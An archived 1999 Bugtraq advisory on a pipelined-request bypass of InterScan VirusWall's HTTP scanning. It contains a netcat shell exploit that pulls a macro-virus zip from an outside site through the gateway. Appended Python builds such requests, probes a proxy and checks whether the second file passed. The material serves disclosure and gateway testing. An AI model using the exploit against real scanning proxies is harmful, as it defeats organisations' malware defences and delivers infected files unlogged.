Bugtraq mailing list archives
BlackHats Advisory -- InterScan VirusWall
From: unicorn () BLACKHATS ORG (The Unicorn)
Date: Mon, 22 Feb 1999 21:31:51 +0100
BlackHats Security Advisory

Release date: February 22, 1999
Application:  InterScan VirusWall for Solaris
Severity:     Any user can download binaries and virus-infected files through the VirusWall
Author(s):    s10 () blackhats org, unicorn () blackhats org

--- Overview: ---

InterScan VirusWall is part of Trend Micro's integrated family of virus protection products that covers every access point - Internet gateways, groupware, e-mail and intranet servers, LAN servers, and desktops. InterScan VirusWall scans inbound and outbound SMTP mail and attachments, FTP and HTTP traffic in real time. It automatically cleans infected files and detects malicious Java applets and ActiveX objects.

When two HTTP GET requests are combined in one message to the proxy, of which the former points to a file that is not scanned, such as a graphic image (e.g. a GIF file), and the latter to a possibly infected binary or macro file, both files are passed to the user requesting the data without any warning or logging by the VirusWall. We found that this combination was sometimes generated by well-known web browsers like Netscape Communicator and Microsoft Internet Explorer during normal use.

We informed Trend Micro of this vulnerability more than three weeks ago. We fully described the problem to Trend Engineering and included an exploit similar to the one described below and all traffic between the browser and VirusWall, but did not receive a fix for this problem. The explanation received was that they were unable to reproduce it on their systems.

Since these systems are used to protect people behind (expensive) firewall configurations against virus infection, we decided to make, at least, the administrators of these systems aware of this exploit, which can be used by users behind an InterScan VirusWall configuration to circumvent the implemented security policy.

--- Affected systems: ---

InterScan VirusWall for Solaris

Implementations of InterScan VirusWall on other platforms are likely to be vulnerable, but have not been tested since we do not have them available.

--- Workarounds/Fixes: ---

We have not yet received a fix from Trend Micro. It might be possible to close this hole by scanning *ALL* data passed in HTTP traffic, but this will have a negative influence on the throughput of the complete firewall configuration.

--- Example: ---

We developed the following exploit that requests two files in one message. The first one is a simple graphic file (in this case from the Trend Micro web-site) and the second one is a file containing a well-known macro virus, which would normally be detected and removed by the product. Using the netcat tool we send this combined request out to the world using the VirusWall as a proxy server. The information received back is stored in a file. When later examining the file we find both the graphic and the virus-infected contents requested. Looking through the logfiles no trace is found of this file seeping through the hole.

#!/bin/sh
# Two proxy-style GET requests (absolute URI in the request line, as a
# browser sends to a proxy), each terminated by an empty line, sent over
# a single connection to the VirusWall HTTP proxy ("viruswall", port 80).
# Everything the proxy sends back lands in the.results.
echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
Referer: http://www.antivirus.com/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: www.antivirus.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
Referer: http://sourceofkaos.com/homes/knowdeth/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: sourceofkaos.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
" | nc viruswall 80 > the.results

Changing the second part of this "code" will enable downloading any information through the Trend Micro InterScan VirusWall, probably because the product only acts on the first GET command in a message, while retrieving all information requested.

--- Further Study: ---

Further study of this vulnerability may focus on FTP and SMTP traffic and the detection of malicious Java applets and ActiveX objects.

Ciao, Unicorn.

--
=======  _   __,;;;/  TimeWaster ================================================
  ,;( )_, )~\|        A Truly Wise Man Never Plays
 ;;  //  `--;         Leapfrog With A Unicorn...
==='= ;\ = | ====     Youth is Not a Time in Life, It is a State of Mind! =======
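An administrator who wants to check a gateway for this class of bypass needs two things the advisory's netcat one-liner leaves implicit: a way to build the combined request for arbitrary URLs, and a way to take the concatenated proxy output (the.results above) apart again so it is clear whether the second body came back untouched, was replaced by a warning page, or never arrived. The following Python is an added example written for this page; it is not code from the BlackHats advisory or from Trend Micro. The proxy host and port, the example.test URL, the helper names and the sample response bytes are all assumptions or constructed data, and the marker bytes stand in for whatever test file you send through the proxy.

```python
"""Pipelined-request checker for an HTTP virus-scanning proxy (added example)."""
import socket
from typing import Dict, List, Tuple

Response = Tuple[int, Dict[str, str], bytes]


def build_pipelined_request(urls: List[str],
                            user_agent: str = "Mozilla/4.5 [en] (WinNT; I)") -> bytes:
    """Concatenate one proxy-style GET per URL into a single message.

    Each request uses an absolute URI in the request line (what a browser
    sends to a proxy), HTTP/1.0, and ends with an empty line, mirroring the
    advisory's echo | nc construction. Put the benign, unscanned file first
    and the file under test second.
    """
    parts = []
    for url in urls:
        host = url.split("://", 1)[1].split("/", 1)[0]
        parts.append(
            f"GET {url} HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            "Proxy-Connection: Keep-Alive\r\n"
            f"User-Agent: {user_agent}\r\n"
            "Accept: */*\r\n"
            "\r\n"
        )
    return "".join(parts).encode("ascii")


def split_responses(data: bytes) -> List[Response]:
    """Parse a byte string holding one or more back-to-back HTTP responses.

    Each body is delimited by its Content-Length header; a response without
    one is taken to run to end of input, as an HTTP/1.0 server would close
    the connection after it.
    """
    responses: List[Response] = []
    pos = 0
    while pos < len(data):
        head_end = data.find(b"\r\n\r\n", pos)
        if head_end < 0:
            break  # truncated header block, nothing more to parse
        head = data[pos:head_end].decode("iso-8859-1")
        lines = head.split("\r\n")
        status = int(lines[0].split(" ", 2)[1])
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        if "content-length" in headers:
            body_end = body_start + int(headers["content-length"])
        else:
            body_end = len(data)
        responses.append((status, headers, data[body_start:body_end]))
        pos = body_end
    return responses


def second_file_leaked(results: bytes, marker: bytes) -> bool:
    """True if a second response exists and its body still carries `marker`.

    A proxy that blocks or replaces the second file (warning page, empty
    body, dropped connection) yields False; only an unmodified pass-through
    of the test file yields True.
    """
    responses = split_responses(results)
    return len(responses) >= 2 and marker in responses[1][2]


def probe(proxy: Tuple[str, int], urls: List[str], timeout: float = 30.0) -> bytes:
    """Send the pipelined request through the proxy and collect its whole reply."""
    with socket.create_connection(proxy, timeout=timeout) as sock:
        sock.sendall(build_pipelined_request(urls))
        chunks = []
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


# Constructed sample of what the.results looks like when the bypass works:
# a GIF-like first response followed by an untouched second file. The
# marker bytes are placeholders, not a real malicious sample.
SAMPLE_RESULTS = (
    b"HTTP/1.0 200 OK\r\nContent-Type: image/gif\r\nContent-Length: 6\r\n\r\nGIF89a"
    b"HTTP/1.0 200 OK\r\nContent-Type: application/zip\r\nContent-Length: 14\r\n\r\n"
    b"PK\x03\x04EICAR-TEST"
)

if __name__ == "__main__":
    # Against a live gateway (host, port and second URL are assumptions):
    # data = probe(("viruswall", 80), ["http://www.antivirus.com/vinfo/images/amb1.gif",
    #                                  "http://example.test/sample.zip"])
    for status, hdrs, body in split_responses(SAMPLE_RESULTS):
        print(status, hdrs.get("content-type"), len(body), "bytes")
    print("second file leaked:", second_file_leaked(SAMPLE_RESULTS, b"PK\x03\x04"))
```

Run `probe()` once with a harmless test file as the second URL and feed the returned bytes to `second_file_leaked()`; if it reports True while the proxy log shows only the first GET, the gateway has the behaviour the advisory describes. The same parser also shows the more useful negative result, a second response whose Content-Type is a warning page rather than the requested file.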